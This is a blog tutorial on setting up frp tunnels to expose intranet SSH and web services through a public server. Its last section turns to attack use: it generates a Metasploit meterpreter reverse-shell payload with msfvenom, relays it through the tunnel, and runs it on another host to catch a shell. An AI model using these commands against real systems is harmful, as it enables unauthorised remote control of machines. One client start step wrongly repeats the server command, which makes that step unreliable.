Frp intranet penetration

Frp intranet penetration

In essence, intranet penetration is also a port mapping. Both of them map the intranet address to the accessible address of the public network. The difference is that the port mapping can be configured directly in the router, while the port mapping configured by intranet penetration needs to be implemented after binding between the client and the server, which is equivalent to establishing a tunnel between the client and the server, Then, the request to access the server will be forwarded to the intranet host through the tunnel, which is mostly used when there is no public IP;

frp is a high-performance reverse proxy application. It can easily penetrate the intranet and provide services to the Internet. It supports tcp, udp, http, https and other protocol types. It can expose the intranet services to the public network through the transit with public IP nodes in a safe and convenient way;

## Chinese document address:  
https://gofrp.org/docs/ 
## github download address:  
https://github.com/fatedier/frp/releases

Frp has client and server. Download the corresponding version according to the system of the installed host. Here, two versions are downloaded, one windows version and one linux version;

1. Mapping intranet SSH services

Upload the linux version file to the ECS through xshell and decompress it;

## Unzip file
tar xf frp_0.33.0_linux_amd64.tar.gz

## Document meaning
frpc			Client program 
frpc_full.ini	Client full profile 
frpc.ini		Client easy profile 
frps			Server program 
frps_full.ini	Server complete configuration file 
frps.ini		Server simple configuration file

Check the simple configuration file, and configure the listening port as 7000, that is, the port for communication between the server and the client;

Start the server program;

 ## Start the server program with simple configuration
 ./frps -c ./frps.ini 

Unzip the linux version file in the local CentOS7 and modify the client simple configuration file frpc.ini;

## Client simple configuration file frpc.ini
[common]
server_addr = 123.456.789.111     ## Public ip address of remote virtual machine
server_port = 7000                ## The port on which the server listens
[ssh] 
type = tcp 					## Protocol type					
local_ip = 127.0.0.1 		## Local ip address
local_port = 22 			## Local port
remote_port = 6000 			## Port mapped to the server

Start the client program;

## Start the client program in a simple configuration
./frpc -c frpc.ini

At this time, the server on the virtual machine will display the successful log information;

View the status of port 6000 on the virtual machine and display that TCP listening has been configured;

You can access the intranet host by accessing the 6000 port of the virtual machine public network ip through xshell;

2. Mapping intranet Web Services

Configure the server configuration file frps.ini, vhost_http_port is the HTTP service access port, vhost_https_port is the HTTPS service access port. Here, take HTTP service as an example;

## frps.ini configuration file
[common]
bind_port = 7000
vhost_http_port = 8080

‚Äč

Start the server program after configuration;

 ## Start the server program with simple configuration
 ./frps -c ./frps.ini 

Change the client configuration file frpc.ini;

## frpc.ini configuration file
[common]
server_addr = 123.456.789.111   ## Public IP of virtual machine
server_port = 7000				## Server bound port

[web]
type = http
local_port = 80					## Port of the local Web service
custom_domains = www.yourdomain.com	 ## Domain name resolved to public IP

Start the client program;

 ## Start the client program in a simple configuration
 ./frps -c ./frps.ini 

The server can view the log information of the successful link;

Access domain name: 8080 can access local Web services;

3. Configure MSF to receive shell s from the public network

The server configuration file does not need to be changed, just modify the client configuration file, and then start the client program;

## frpc.ini configuration file
[common]
server_addr = 123.456.789.111   ## Public IP of virtual machine
server_port = 7000				## Server bound port

[msf] 
type = tcp 
local_port = 4444 		## Local port to be monitored
local_ip = 127.0.0.1 
remote_port = 8085 		## Virtual machine mapping port

Generate a payload, LHOST is specified as the public IP, and LPORT is specified as the public mapping port;

## Generate payload using msfvenom
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu 

Start MSF locally and configure listening. At this time, the listening LOST is the local ip address and LPORT is the local port in the frpc.ini configuration file;

## MSF configure local listening
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.1.105
set LPORT 4444 
exploit 


Copy the payload to another Centos and execute;

## Copy the payload and execute
scp xuyu root@192.168.1.6:/root/
chmod +x xuyu
./xuyu

MSF successfully received the shell;

Tags: security Web Security

Posted by Stasonis on Fri, 24 Sep 2021 20:42:11 +0530